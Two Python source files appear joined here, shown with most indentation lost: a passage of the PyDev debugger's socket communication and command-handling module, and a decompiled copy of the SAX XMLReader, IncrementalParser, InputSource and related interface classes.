'107':'CMD_STEP_INTO',
'108':'CMD_STEP_OVER',
'109':'CMD_STEP_RETURN',
'110':'CMD_GET_VARIABLE',
'111':'CMD_SET_BREAK',
'112':'CMD_REMOVE_BREAK',
'113':'CMD_EVALUATE_EXPRESSION',
'114':'CMD_GET_FRAME',
'115':'CMD_EXEC_EXPRESSION',
'116':'CMD_WRITE_TO_CONSOLE',
'117':'CMD_CHANGE_VARIABLE',
'118':'CMD_RUN_TO_LINE',
'119':'CMD_RELOAD_CODE',
'120':'CMD_GET_COMPLETIONS',
'121':'CMD_CONSOLE_EXEC',
'122':'CMD_ADD_EXCEPTION_BREAK',
'123':'CMD_REMOVE_EXCEPTION_BREAK',
'124':'CMD_LOAD_SOURCE',
'125':'CMD_ADD_DJANGO_EXCEPTION_BREAK',
'126':'CMD_REMOVE_DJANGO_EXCEPTION_BREAK',
'127':'CMD_SET_NEXT_STATEMENT',
'128':'CMD_SMART_STEP_INTO',
'129': 'CMD_EXIT',
'130': 'CMD_SIGNATURE_CALL_TRACE',
'501':'CMD_VERSION',
'502':'CMD_RETURN',
'901':'CMD_ERROR',
}
MAX_IO_MSG_SIZE = 1000 #if the io is too big, we'll not send all (could make the debugger too non-responsive)
#this number can be changed if there's need to do so
VERSION_STRING = "@@BUILD_NUMBER@@"
#--------------------------------------------------------------------------------------------------- UTILITIES
#=======================================================================================================================
# PydevdLog
#=======================================================================================================================
def PydevdLog(level, *args):
""" levels are:
0 most serious warnings/errors
1 warnings/significant events
2 informational trace
"""
if level <= DebugInfoHolder.DEBUG_TRACE_LEVEL:
#errors can happen while printing if the program's console has already been closed (and we're still trying to print something)
try:
sys.stderr.write('%s\n' % (args,))
except:
pass
#=======================================================================================================================
# GlobalDebuggerHolder
#=======================================================================================================================
class GlobalDebuggerHolder:
'''
Holder for the global debugger.
'''
globalDbg = None
#=======================================================================================================================
# GetGlobalDebugger
#=======================================================================================================================
def GetGlobalDebugger():
return GlobalDebuggerHolder.globalDbg
#=======================================================================================================================
# SetGlobalDebugger
#=======================================================================================================================
def SetGlobalDebugger(dbg):
GlobalDebuggerHolder.globalDbg = dbg
#------------------------------------------------------------------- ACTUAL COMM
#=======================================================================================================================
# PyDBDaemonThread
#=======================================================================================================================
class PyDBDaemonThread(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
self.setDaemon(True)
self.killReceived = False
self.dontTraceMe = True
def run(self):
if sys.platform.startswith("java"):
import org.python.core as PyCore #@UnresolvedImport
ss = PyCore.PySystemState()
# Note: Py.setSystemState() affects only the current thread.
PyCore.Py.setSystemState(ss)
self.OnRun()
def OnRun(self):
raise NotImplementedError('Should be reimplemented by: %s' % self.__class__)
def doKillPydevThread(self):
#that was not working very well because jython gave some socket errors
self.killReceived = True
def stop(self):
_Thread_stop(self)
def stopTrace(self):
if self.dontTraceMe:
pydevd_tracing.SetTrace(None) # no debugging on this thread
#=======================================================================================================================
# ReaderThread
#=======================================================================================================================
class ReaderThread(PyDBDaemonThread):
""" reader thread reads and dispatches commands in an infinite loop """
def __init__(self, sock):
PyDBDaemonThread.__init__(self)
self.sock = sock
self.setName("pydevd.Reader")
def doKillPydevThread(self):
#We must close the socket so that it doesn't stay halted there.
self.killReceived = True
try:
self.sock.shutdown(SHUT_RD) #shut down the socket for reads
except:
#just ignore that
pass
def OnRun(self):
self.stopTrace()
buffer = ""
try:
while not self.killReceived:
try:
r = self.sock.recv(1024)
except:
if not self.killReceived:
self.handleExcept()
return #Finished communication.
if IS_PY3K:
r = r.decode('utf-8')
buffer += r
if DebugInfoHolder.DEBUG_RECORD_SOCKET_READS:
pydev_log.debug('received >>%s<<\n' % (buffer,))
if len(buffer) == 0:
self.handleExcept()
break
while buffer.find('\n') != -1:
command, buffer = buffer.split('\n', 1)
pydev_log.debug('Received command: >>%s<<\n' % (command,))
args = command.split('\t', 2)
try:
self.processCommand(int(args[0]), int(args[1]), args[2])
except:
traceback.print_exc()
sys.stderr.write("Can't process net command: %s\n" % command)
sys.stderr.flush()
except:
traceback.print_exc()
self.handleExcept()
def handleExcept(self):
GlobalDebuggerHolder.globalDbg.FinishDebuggingSession()
def processCommand(self, cmd_id, seq, text):
GlobalDebuggerHolder.globalDbg.processNetCommand(cmd_id, seq, text)
#----------------------------------------------------------------------------------- SOCKET UTILITIES - WRITER
#=======================================================================================================================
# WriterThread
#=======================================================================================================================
class WriterThread(PyDBDaemonThread):
""" writer thread writes out the commands in an infinite loop """
def __init__(self, sock):
PyDBDaemonThread.__init__(self)
self.setDaemon(False) #the writer isn't a daemon thread so it can still deliver all messages after the main thread terminates
self.sock = sock
self.setName("pydevd.Writer")
self.cmdQueue = _queue.Queue()
if pydevd_vm_type.GetVmType() == 'python':
self.timeout = 0
else:
self.timeout = 0.1
def addCommand(self, cmd):
""" cmd is NetCommand """
if not self.killReceived: #we don't accept new data after everybody dies
self.cmdQueue.put(cmd)
def OnRun(self):
""" just loop and write responses """
self.stopTrace()
try:
while True:
try:
try:
cmd = self.cmdQueue.get(1, 0.1)
except _queue.Empty:
if self.killReceived:
try:
self.sock.shutdown(SHUT_WR)
self.sock.close()
except:
pass
self.stop() #mark thread as stopped to unblock joined threads for sure (they can hang otherwise)
return #break if queue is empty and killReceived
else:
continue
except:
#PydevdLog(0, 'Finishing debug communication...(1)')
#when liberating the thread here, we could have errors because we were shutting down
#but the thread was still not liberated
return
out = cmd.getOutgoing()
if DebugInfoHolder.DEBUG_TRACE_LEVEL >= 1:
out_message = 'sending cmd: '
out_message += ID_TO_MEANING.get(out[:3], 'UNKNOWN')
out_message += ' '
out_message += out
try:
sys.stderr.write('%s\n' % (out_message,))
except:
pass
if IS_PY3K:
out = bytearray(out, 'utf-8')
self.sock.send(out) #TODO: this does not guarantee that all messages are sent (and jython does not have a sendall)
if cmd.id == CMD_EXIT:
break
if time is None:
break #interpreter shutdown
time.sleep(self.timeout)
except Exception:
GlobalDebuggerHolder.globalDbg.FinishDebuggingSession()
if DebugInfoHolder.DEBUG_TRACE_LEVEL >= 0:
traceback.print_exc()
#--------------------------------------------------- CREATING THE SOCKET THREADS
#=======================================================================================================================
# StartServer
#=======================================================================================================================
def StartServer(port):
""" binds to a port, waits for the debugger to connect """
s = socket(AF_INET, SOCK_STREAM)
s.bind(('', port))
s.listen(1)
newSock, _addr = s.accept()
return newSock
#=======================================================================================================================
# StartClient
#=======================================================================================================================
def StartClient(host, port):
""" connects to a host/port """
PydevdLog(1, "Connecting to ", host, ":", str(port))
s = socket(AF_INET, SOCK_STREAM)
MAX_TRIES = 3
i = 0
while i<MAX_TRIES:
try:
s.connect((host, port))
except:
i+=1
time.sleep(0.2)
continue
PydevdLog(1, "Connected.")
return s
sys.stderr.write("Could not connect to %s: %s\n" % (host, port))
sys.stderr.flush()
traceback.print_exc()
sys.exit(1) #TODO: is it safe?
#------------------------------------------------------------------------------------ MANY COMMUNICATION STUFF
#=======================================================================================================================
# NetCommand
#=======================================================================================================================
class NetCommand:
""" Commands received/sent over the network.
Command can represent command received from the debugger,
or one to be sent by daemon.
"""
next_seq = 0 # sequence numbers
def __init__(self, id, seq, text):
""" smart handling of paramaters
if sequence is 0, new sequence will be generated
if text has carriage returns they'll be replaced"""
self.id = id
if (seq == 0): seq = self.getNextSeq()
self.seq = seq
self.text = text
self.outgoing = self.makeMessage(id, seq, text)
def getNextSeq(self):
""" returns next sequence number """
NetCommand.next_seq += 2
return NetCommand.next_seq
def getOutgoing(self):
""" returns the outgoing message"""
return self.outgoing
def makeMessage(self, cmd, seq, payload):
encoded = quote(to_string(payload), '/<>_=" \t')
return str(cmd) + '\t' + str(seq) + '\t' + encoded + "\n"
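#=======================================================================================================================
# _example_net_command (illustrative sketch; not used by the debugger itself)
#=======================================================================================================================
def _example_net_command():
    """Shows how a command is serialized for the wire.

    The payload below is a placeholder; makeMessage url-quotes it and the
    result has the 'id\\tsequence-num\\tpayload\\n' shape from the module
    docstring, e.g. something like '501\\t2\\texample-payload\\n'.
    """
    cmd = NetCommand(CMD_VERSION, 0, 'example-payload')  # seq 0 -> auto-generated even seq
    return cmd.getOutgoing()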
#=======================================================================================================================
# NetCommandFactory
#=======================================================================================================================
class NetCommandFactory:
def __init__(self):
self.next_seq = 0
def threadToXML(self, thread):
""" thread information as XML """
name = pydevd_vars.makeValidXmlValue(thread.getName())
cmdText = '<thread name="%s" id="%s" />' % (quote(name), GetThreadId(thread))
return cmdText
def makeErrorMessage(self, seq, text):
cmd = NetCommand(CMD_ERROR, seq, text)
if DebugInfoHolder.DEBUG_TRACE_LEVEL > 2:
sys.stderr.write("Error: %s" % (text,))
return cmd
def makeThreadCreatedMessage(self, thread):
cmdText = "<xml>" + self.threadToXML(thread) + "</xml>"
return NetCommand(CMD_THREAD_CREATE, 0, cmdText)
def makeListThreadsMessage(self, seq):
""" returns thread listing as XML """
try:
t = threading.enumerate()
cmdText = "<xml>"
for i in t:
if i.isAlive():
cmdText += self.threadToXML(i)
cmdText += "</xml>"
return NetCommand(CMD_RETURN, seq, cmdText)
except:
return self.makeErrorMessage(seq, GetExceptionTracebackStr())
def makeVariableChangedMessage(self, seq, payload):
# notify debugger that value was changed successfully
return NetCommand(CMD_RETURN, seq, payload)
def makeIoMessage(self, v, ctx, dbg=None):
'''
@param v: the message to pass to the debug server
@param ctx: 1 for stdout, 2 for stderr
@param dbg: If not none, add to the writer
'''
try:
if len(v) > MAX_IO_MSG_SIZE:
v = v[0:MAX_IO_MSG_SIZE]
v += '...'
v = pydevd_vars.makeValidXmlValue(quote(v, '/>_= \t'))
net = NetCommand(str(CMD_WRITE_TO_CONSOLE), 0, '<xml><io s="%s" ctx="%s"/></xml>' % (v, ctx))
except:
net = self.makeErrorMessage(0, GetExceptionTracebackStr())
if dbg:
dbg.writer.addCommand(net)
return net
def makeVersionMessage(self, seq):
try:
return NetCommand(CMD_VERSION, seq, VERSION_STRING)
except:
return self.makeErrorMessage(seq, GetExceptionTracebackStr())
def makeThreadKilledMessage(self, id):
try:
return NetCommand(CMD_THREAD_KILL, 0, str(id))
except:
return self.makeErrorMessage(0, GetExceptionTracebackStr())
def makeThreadSuspendMessage(self, thread_id, frame, stop_reason, message):
""" <xml>
<thread id="id" stop_reason="reason">
<frame id="id" name="functionName " file="file" line="line">
<var variable stuffff....
</frame>
</thread>
"""
try:
cmdTextList = ["<xml>"]
if message:
message = pydevd_vars.makeValidXmlValue(str(message))
cmdTextList.append('<thread id="%s" stop_reason="%s" message="%s">' % (thread_id, stop_reason, message))
curFrame = frame
try:
while curFrame:
#print cmdText
myId = str(id(curFrame))
#print "id is ", myId
if curFrame.f_code is None:
break #Iron Python sometimes does not have it!
myName = curFrame.f_code.co_name #method name (if in method) or ? if global
if myName is None:
break #Iron Python sometimes does not have it!
#print "name is ", myName
filename, base = pydevd_file_utils.GetFilenameAndBase(curFrame)
myFile = pydevd_file_utils.NormFileToClient(filename)
#print "file is ", myFile
#myFile = inspect.getsourcefile(curFrame) or inspect.getfile(frame)
myLine = str(curFrame.f_lineno)
#print "line is ", myLine
#the variables are all gotten 'on-demand'
#variables = pydevd_vars.frameVarsToXML(curFrame.f_locals)
variables = ''
cmdTextList.append('<frame id="%s" name="%s" ' % (myId , pydevd_vars.makeValidXmlValue(myName)))
cmdTextList.append('file="%s" line="%s">"' % (quote(myFile, '/>_= \t'), myLine))
cmdTextList.append(variables)
cmdTextList.append("</frame>")
curFrame = curFrame.f_back
except :
traceback.print_exc()
cmdTextList.append("</thread></xml>")
cmdText = ''.join(cmdTextList)
return NetCommand(CMD_THREAD_SUSPEND, 0, cmdText)
except:
return self.makeErrorMessage(0, GetExceptionTracebackStr())
def makeThreadRunMessage(self, id, reason):
try:
return NetCommand(CMD_THREAD_RUN, 0, str(id) + "\t" + str(reason))
except:
return self.makeErrorMessage(0, GetExceptionTracebackStr())
def makeGetVariableMessage(self, seq, payload):
try:
return NetCommand(CMD_GET_VARIABLE, seq, payload)
except Exception:
return self.makeErrorMessage(seq, GetExceptionTracebackStr())
def makeGetFrameMessage(self, seq, payload):
try:
return NetCommand(CMD_GET_FRAME, seq, payload)
except Exception:
return self.makeErrorMessage(seq, GetExceptionTracebackStr())
def makeEvaluateExpressionMessage(self, seq, payload):
try:
return NetCommand(CMD_EVALUATE_EXPRESSION, seq, payload)
except Exception:
return self.makeErrorMessage(seq, GetExceptionTracebackStr())
def makeGetCompletionsMessage(self, seq, payload):
try:
return NetCommand(CMD_GET_COMPLETIONS, seq, payload)
except Exception:
return self.makeErrorMessage(seq, GetExceptionTracebackStr())
def makeLoadSourceMessage(self, seq, source, dbg=None):
try:
net = NetCommand(CMD_LOAD_SOURCE, seq, '%s' % source)
except:
net = self.makeErrorMessage(0, GetExceptionTracebackStr())
if dbg:
dbg.writer.addCommand(net)
return net
def makeExitMessage(self):
try:
net = NetCommand(CMD_EXIT, 0, '')
except:
net = self.makeErrorMessage(0, GetExceptionTracebackStr())
return net
INTERNAL_TERMINATE_THREAD = 1
INTERNAL_SUSPEND_THREAD = 2
#=======================================================================================================================
# InternalThreadCommand
#=======================================================================================================================
class InternalThreadCommand:
""" internal commands are generated/executed by the debugger.
The reason for their existence is that some commands have to be executed
on specific threads. These are the InternalThreadCommands that get
posted to PyDB.cmdQueue.
"""
def canBeExecutedBy(self, thread_id):
'''By default, it must be in the same thread to be executed
'''
return self.thread_id == thread_id
def doIt(self, dbg):
raise NotImplementedError("you have to override doIt")
#=======================================================================================================================
# InternalTerminateThread
#=======================================================================================================================
class InternalTerminateThread(InternalThreadCommand):
def __init__(self, thread_id):
self.thread_id = thread_id
def doIt(self, dbg):
PydevdLog(1, "killing ", str(self.thread_id))
cmd = dbg.cmdFactory.makeThreadKilledMessage(self.thread_id)
dbg.writer.addCommand(cmd)
#=======================================================================================================================
# InternalRunThread
#=======================================================================================================================
class InternalRunThread(InternalThreadCommand):
def __init__(self, thread_id):
self.thread_id = thread_id
def doIt(self, dbg):
t = PydevdFindThreadById(self.thread_id)
if t:
t.additionalInfo.pydev_step_cmd = None
t.additionalInfo.pydev_step_stop = None
t.additionalInfo.pydev_state = STATE_RUN
#=======================================================================================================================
# InternalStepThread
#=======================================================================================================================
class InternalStepThread(InternalThreadCommand):
def __init__(self, thread_id, cmd_id):
self.thread_id = thread_id
self.cmd_id = cmd_id
def doIt(self, dbg):
t = PydevdFindThreadById(self.thread_id)
if t:
t.additionalInfo.pydev_step_cmd = self.cmd_id
t.additionalInfo.pydev_state = STATE_RUN
#=======================================================================================================================
# InternalSetNextStatementThread
#=======================================================================================================================
class InternalSetNextStatementThread(InternalThreadCommand):
def __init__(self, thread_id, cmd_id, line, func_name):
self.thread_id = thread_id
self.cmd_id = cmd_id
self.line = line
self.func_name = func_name
def doIt(self, dbg):
t = PydevdFindThreadById(self.thread_id)
if t:
t.additionalInfo.pydev_step_cmd = self.cmd_id
t.additionalInfo.pydev_next_line = int(self.line)
t.additionalInfo.pydev_func_name = self.func_name
t.additionalInfo.pydev_state = STATE_RUN
#=======================================================================================================================
# InternalGetVariable
#=======================================================================================================================
class InternalGetVariable(InternalThreadCommand):
""" gets the value of a variable """
def __init__(self, seq, thread_id, frame_id, scope, attrs):
self.sequence = seq
self.thread_id = thread_id
self.frame_id = frame_id
self.scope = scope
self.attributes = attrs
def doIt(self, dbg):
""" Converts request into python variable """
try:
xml = "<xml>"
valDict = pydevd_vars.resolveCompoundVariable(self.thread_id, self.frame_id, self.scope, self.attributes)
if valDict is None:
valDict = {}
keys = valDict.keys()
if hasattr(keys, 'sort'):
keys.sort(compare_object_attrs) #Python 3.0 does not have it
else:
if IS_PY3K:
keys = sorted(keys, key=cmp_to_key(compare_object_attrs)) #Jython 2.1 does not have it (and all must be compared as strings).
else:
keys = sorted(keys, cmp=compare_object_attrs) #Jython 2.1 does not have it (and all must be compared as strings).
for k in keys:
xml += pydevd_vars.varToXML(valDict[k], to_string(k))
xml += "</xml>"
cmd = dbg.cmdFactory.makeGetVariableMessage(self.sequence, xml)
dbg.writer.addCommand(cmd)
except Exception:
cmd = dbg.cmdFactory.makeErrorMessage(self.sequence, "Error resolving variables " + GetExceptionTracebackStr())
dbg.writer.addCommand(cmd)
#=======================================================================================================================
# InternalChangeVariable
#=======================================================================================================================
class InternalChangeVariable(InternalThreadCommand):
""" changes the value of a variable """
def __init__(self, seq, thread_id, frame_id, scope, attr, expression):
self.sequence = seq
self.thread_id = thread_id
self.frame_id = frame_id
self.scope = scope
self.attr = attr
self.expression = expression
def doIt(self, dbg):
""" Converts request into python variable """
try:
result = pydevd_vars.changeAttrExpression(self.thread_id, self.frame_id, self.attr, self.expression)
xml = "<xml>"
xml += pydevd_vars.varToXML(result, "")
xml += "</xml>"
cmd = dbg.cmdFactory.makeVariableChangedMessage(self.sequence, xml)
dbg.writer.addCommand(cmd)
except Exception:
cmd = dbg.cmdFactory.makeErrorMessage(self.sequence, "Error changing variable attr:%s expression:%s traceback:%s" % (self.attr, self.expression, GetExceptionTracebackStr()))
dbg.writer.addCommand(cmd)
#=======================================================================================================================
# InternalGetFrame
#=======================================================================================================================
class InternalGetFrame(InternalThreadCommand):
""" gets the value of a variable """
def __init__(self, seq, thread_id, frame_id):
self.sequence = seq
self.thread_id = thread_id
self.frame_id = frame_id
def doIt(self, dbg):
""" Converts request into python variable """
try:
frame = pydevd_vars.findFrame(self.thread_id, self.frame_id)
if frame is not None:
xml = "<xml>"
xml += pydevd_vars.frameVarsToXML(frame.f_locals)
del frame
xml += "</xml>"
cmd = dbg.cmdFactory.makeGetFrameMessage(self.sequence, xml)
dbg.writer.addCommand(cmd)
else:
#pydevd_vars.dumpFrames(self.thread_id)
#don't print this error: frame not found: means that the client is not synchronized (but that's ok)
cmd = dbg.cmdFactory.makeErrorMessage(self.sequence, "Frame not found: %s from thread: %s" % (self.frame_id, self.thread_id))
dbg.writer.addCommand(cmd)
except:
cmd = dbg.cmdFactory.makeErrorMessage(self.sequence, "Error resolving frame: %s from thread: %s" % (self.frame_id, self.thread_id))
dbg.writer.addCommand(cmd)
#=======================================================================================================================
# InternalEvaluateExpression
#=======================================================================================================================
class InternalEvaluateExpression(InternalThreadCommand):
""" gets the value of a variable """
def __init__(self, seq, thread_id, frame_id, expression, doExec, doTrim):
self.sequence = seq
self.thread_id = thread_id
self.frame_id = frame_id
self.expression = expression
self.doExec = doExec
self.doTrim = doTrim
def doIt(self, dbg):
""" Converts request into python variable """
try:
result = pydevd_vars.evaluateExpression(self.thread_id, self.frame_id, self.expression, self.doExec)
xml = "<xml>"
xml += pydevd_vars.varToXML(result, "", self.doTrim)
xml += "</xml>"
cmd = dbg.cmdFactory.makeEvaluateExpressionMessage(self.sequence, xml)
dbg.writer.addCommand(cmd)
except:
exc = GetExceptionTracebackStr()
sys.stderr.write('%s\n' % (exc,))
cmd = dbg.cmdFactory.makeErrorMessage(self.sequence, "Error evaluating expression " + exc)
dbg.writer.addCommand(cmd)
#=======================================================================================================================
# InternalConsoleExec
#=======================================================================================================================
class InternalConsoleExec(InternalThreadCommand):
""" gets the value of a variable """
def __init__(self, seq, thread_id, frame_id, expression):
self.sequence = seq
self.thread_id = thread_id
self.frame_id = frame_id
self.expression = expression
def doIt(self, dbg):
""" Converts request into python variable """
pydev_start_new_thread = None
try:
try:
pydev_start_new_thread = thread.start_new_thread
thread.start_new_thread = thread._original_start_new_thread #don't trace new threads created by console command
thread.start_new = thread._original_start_new_thread
result = pydevconsole.consoleExec(self.thread_id, self.frame_id, self.expression)
xml = "<xml>"
xml += pydevd_vars.varToXML(result, "")
xml += "</xml>"
cmd = dbg.cmdFactory.makeEvaluateExpressionMessage(self.sequence, xml)
dbg.writer.addCommand(cmd)
except:
exc = GetExceptionTracebackStr()
sys.stderr.write('%s\n' % (exc,))
cmd = dbg.cmdFactory.makeErrorMessage(self.sequence, "Error evaluating console expression " + exc)
dbg.writer.addCommand(cmd)
finally:
thread.start_new_thread = pydev_start_new_thread
thread.start_new = pydev_start_new_thread
sys.stderr.flush()
sys.stdout.flush()
#=======================================================================================================================
# InternalGetCompletions
#=======================================================================================================================
class InternalGetCompletions(InternalThreadCommand):
""" Gets the completions in a given scope """
def __init__(self, seq, thread_id, frame_id, act_tok):
self.sequence = seq
self.thread_id = thread_id
self.frame_id = frame_id
self.act_tok = act_tok
def doIt(self, dbg):
""" Converts request into completions """
try:
remove_path = None
try:
import _completer
except:
try:
path = os.environ['PYDEV_COMPLETER_PYTHONPATH']
except :
path = os.path.dirname(__file__)
sys.path.append(path)
remove_path = path
try:
import _completer
except :
pass
try:
frame = pydevd_vars.findFrame(self.thread_id, self.frame_id)
if frame is not None:
#Not using frame.f_globals because of https://sourceforge.net/tracker2/?func=detail&aid=2541355&group_id=85796&atid=577329
#(Names not resolved in generator expression in method)
#See message: http://mail.python.org/pipermail/python-list/2009-January/526522.html
updated_globals = {}
updated_globals.update(frame.f_globals)
updated_globals.update(frame.f_locals) #locals later because it has precedence over the actual globals
locals = frame.f_locals
else:
updated_globals = {}
locals = {}
if pydevconsole.IPYTHON:
completions = pydevconsole.get_completions(self.act_tok, self.act_tok, updated_globals, locals)
else:
try:
completer = _completer.Completer(updated_globals, None)
#list(tuple(name, descr, parameters, type))
completions = completer.complete(self.act_tok)
except :
completions = []
def makeValid(s):
return pydevd_vars.makeValidXmlValue(pydevd_vars.quote(s, '/>_= \t'))
msg = "<xml>"
for comp in completions:
msg += '<comp p0="%s" p1="%s" p2="%s" p3="%s"/>' % (makeValid(comp[0]), makeValid(comp[1]), makeValid(comp[2]), makeValid(comp[3]),)
msg += "</xml>"
cmd = dbg.cmdFactory.makeGetCompletionsMessage(self.sequence, msg)
dbg.writer.addCommand(cmd)
finally:
if remove_path is not None:
sys.path.remove(remove_path)
except:
exc = GetExceptionTracebackStr()
sys.stderr.write('%s\n' % (exc,))
cmd = dbg.cmdFactory.makeErrorMessage(self.sequence, "Error getting completion " + exc)
dbg.writer.addCommand(cmd)
#=======================================================================================================================
# PydevdFindThreadById
#=======================================================================================================================
def PydevdFindThreadById(thread_id):
try:
# there was a deadlock here when I did not remove the tracing function when thread was dead
threads = threading.enumerate()
for i in threads:
if thread_id == GetThreadId(i):
return i
sys.stderr.write("Could not find thread %s\n" % thread_id)
sys.stderr.write("Available: %s\n" % [GetThreadId(t) for t in threads])
sys.stderr.flush()
except:
traceback.print_exc()
return None
|
|
# uncompyle6 version 2.9.10
# Python bytecode 2.7 (62211)
# Decompiled from: Python 3.6.0b2 (default, Oct 11 2016, 05:27:10)
# [GCC 6.2.0 20161005]
# Embedded file name: xmlreader.py
"""An XML Reader is the SAX 2 name for an XML parser. XML Parsers
should be based on this code. """
import handler
from _exceptions import SAXNotSupportedException, SAXNotRecognizedException
class XMLReader:
"""Interface for reading an XML document using callbacks.
XMLReader is the interface that an XML parser's SAX2 driver must
implement. This interface allows an application to set and query
features and properties in the parser, to register event handlers
for document processing, and to initiate a document parse.
All SAX interfaces are assumed to be synchronous: the parse
methods must not return until parsing is complete, and readers
must wait for an event-handler callback to return before reporting
the next event."""
def __init__(self):
self._cont_handler = handler.ContentHandler()
self._dtd_handler = handler.DTDHandler()
self._ent_handler = handler.EntityResolver()
self._err_handler = handler.ErrorHandler()
def parse(self, source):
"""Parse an XML document from a system identifier or an InputSource."""
raise NotImplementedError('This method must be implemented!')
def getContentHandler(self):
"""Returns the current ContentHandler."""
return self._cont_handler
def setContentHandler(self, handler):
"""Registers a new object to receive document content events."""
self._cont_handler = handler
def getDTDHandler(self):
"""Returns the current DTD handler."""
return self._dtd_handler
def setDTDHandler(self, handler):
"""Register an object to receive basic DTD-related events."""
self._dtd_handler = handler
def getEntityResolver(self):
"""Returns the current EntityResolver."""
return self._ent_handler
def setEntityResolver(self, resolver):
"""Register an object to resolve external entities."""
self._ent_handler = resolver
def getErrorHandler(self):
"""Returns the current ErrorHandler."""
return self._err_handler
def setErrorHandler(self, handler):
"""Register an object to receive error-message events."""
self._err_handler = handler
def setLocale(self, locale):
"""Allow an application to set the locale for errors and warnings.
SAX parsers are not required to provide localization for errors
and warnings; if they cannot support the requested locale,
however, they must throw a SAX exception. Applications may
request a locale change in the middle of a parse."""
raise SAXNotSupportedException('Locale support not implemented')
def getFeature(self, name):
"""Looks up and returns the state of a SAX2 feature."""
raise SAXNotRecognizedException("Feature '%s' not recognized" % name)
def setFeature(self, name, state):
"""Sets the state of a SAX2 feature."""
raise SAXNotRecognizedException("Feature '%s' not recognized" % name)
def getProperty(self, name):
"""Looks up and returns the value of a SAX2 property."""
raise SAXNotRecognizedException("Property '%s' not recognized" % name)
def setProperty(self, name, value):
"""Sets the value of a SAX2 property."""
raise SAXNotRecognizedException("Property '%s' not recognized" % name)
class IncrementalParser(XMLReader):
"""This interface adds three extra methods to the XMLReader
interface that allow XML parsers to support incremental
parsing. Support for this interface is optional, since not all
underlying XML parsers support this functionality.
When the parser is instantiated it is ready to begin accepting
data from the feed method immediately. After parsing has been
finished with a call to close the reset method must be called to
make the parser ready to accept new data, either from feed or
using the parse method.
Note that these methods must _not_ be called during parsing, that
is, after parse has been called and before it returns.
By default, the class also implements the parse method of the XMLReader
interface using the feed, close and reset methods of the
IncrementalParser interface as a convenience to SAX 2.0 driver
writers."""
def __init__(self, bufsize=65536):
self._bufsize = bufsize
XMLReader.__init__(self)
def parse(self, source):
import saxutils
source = saxutils.prepare_input_source(source)
self.prepareParser(source)
file = source.getByteStream()
buffer = file.read(self._bufsize)
while buffer != '':
self.feed(buffer)
buffer = file.read(self._bufsize)
self.close()
def feed(self, data):
"""This method gives the raw XML data in the data parameter to
the parser and makes it parse the data, emitting the
corresponding events. It is allowed for XML constructs to be
split across several calls to feed.
feed may raise SAXException."""
raise NotImplementedError('This method must be implemented!')
def prepareParser(self, source):
"""This method is called by the parse implementation to allow
the SAX 2.0 driver to prepare itself for parsing."""
raise NotImplementedError('prepareParser must be overridden!')
def close(self):
"""This method is called when the entire XML document has been
passed to the parser through the feed method, to notify the
parser that there are no more data. This allows the parser to
do the final checks on the document and empty the internal
data buffer.
The parser will not be ready to parse another document until
the reset method has been called.
close may raise SAXException."""
raise NotImplementedError('This method must be implemented!')
def reset(self):
"""This method is called after close has been called to reset
the parser so that it is ready to parse new documents. The
results of calling parse or feed after close without calling
reset are undefined."""
raise NotImplementedError('This method must be implemented!')
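# Illustrative sketch (not part of the SAX API): a minimal IncrementalParser
# subclass showing the feed/close/reset life cycle described above. It does
# no real XML parsing; it only counts the bytes it is fed.
class _ByteCountingParser(IncrementalParser):
    def __init__(self, bufsize=65536):
        IncrementalParser.__init__(self, bufsize)
        self._nbytes = 0
    def feed(self, data):
        # a real driver would tokenize here and fire ContentHandler events
        self._nbytes = self._nbytes + len(data)
    def prepareParser(self, source):
        # nothing to set up for this toy parser
        pass
    def close(self):
        # final consistency checks on the document would go here
        pass
    def reset(self):
        # make the parser ready for the next document
        self._nbytes = 0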
class Locator:
"""Interface for associating a SAX event with a document
location. A locator object will return valid results only during
calls to DocumentHandler methods; at any other time, the
results are unpredictable."""
def getColumnNumber(self):
"""Return the column number where the current event ends."""
return -1
def getLineNumber(self):
"""Return the line number where the current event ends."""
return -1
def getPublicId(self):
"""Return the public identifier for the current event."""
return None
def getSystemId(self):
"""Return the system identifier for the current event."""
return None
class InputSource:
"""Encapsulation of the information needed by the XMLReader to
read entities.
This class may include information about the public identifier,
system identifier, byte stream (possibly with character encoding
information) and/or the character stream of an entity.
Applications will create objects of this class for use in the
XMLReader.parse method and for returning from
EntityResolver.resolveEntity.
An InputSource belongs to the application, the XMLReader is not
allowed to modify InputSource objects passed to it from the
application, although it may make copies and modify those."""
def __init__(self, system_id=None):
self.__system_id = system_id
self.__public_id = None
self.__encoding = None
self.__bytefile = None
self.__charfile = None
return
def setPublicId(self, public_id):
"""Sets the public identifier of this InputSource."""
self.__public_id = public_id
def getPublicId(self):
"""Returns the public identifier of this InputSource."""
return self.__public_id
def setSystemId(self, system_id):
"""Sets the system identifier of this InputSource."""
self.__system_id = system_id
def getSystemId(self):
"""Returns the system identifier of this InputSource."""
return self.__system_id
def setEncoding(self, encoding):
"""Sets the character encoding of this InputSource.
The encoding must be a string acceptable for an XML encoding
declaration (see section 4.3.3 of the XML recommendation).
The encoding attribute of the InputSource is ignored if the
InputSource also contains a character stream."""
self.__encoding = encoding
def getEncoding(self):
"""Get the character encoding of this InputSource."""
return self.__encoding
def setByteStream(self, bytefile):
"""Set the byte stream (a Python file-like object which does
not perform byte-to-character conversion) for this input
source.
The SAX parser will ignore this if there is also a character
stream specified, but it will use a byte stream in preference
to opening a URI connection itself.
If the application knows the character encoding of the byte
stream, it should set it with the setEncoding method."""
self.__bytefile = bytefile
def getByteStream(self):
"""Get the byte stream for this input source.
The getEncoding method will return the character encoding for
this byte stream, or None if unknown."""
return self.__bytefile
def setCharacterStream(self, charfile):
"""Set the character stream for this input source. (The stream
must be a Python 2.0 Unicode-wrapped file-like that performs
conversion to Unicode strings.)
If there is a character stream specified, the SAX parser will
ignore any byte stream and will not attempt to open a URI
connection to the system identifier."""
self.__charfile = charfile
def getCharacterStream(self):
"""Get the character stream for this input source."""
return self.__charfile
class AttributesImpl:
def __init__(self, attrs):
"""Non-NS-aware implementation.
attrs should be of the form {name : value}."""
self._attrs = attrs
def getLength(self):
return len(self._attrs)
def getType(self, name):
return 'CDATA'
def getValue(self, name):
return self._attrs[name]
def getValueByQName(self, name):
return self._attrs[name]
def getNameByQName(self, name):
if name not in self._attrs:
raise KeyError, name
return name
def getQNameByName(self, name):
if name not in self._attrs:
raise KeyError, name
return name
def getNames(self):
return self._attrs.keys()
def getQNames(self):
return self._attrs.keys()
def __len__(self):
return len(self._attrs)
def __getitem__(self, name):
return self._attrs[name]
def keys(self):
return self._attrs.keys()
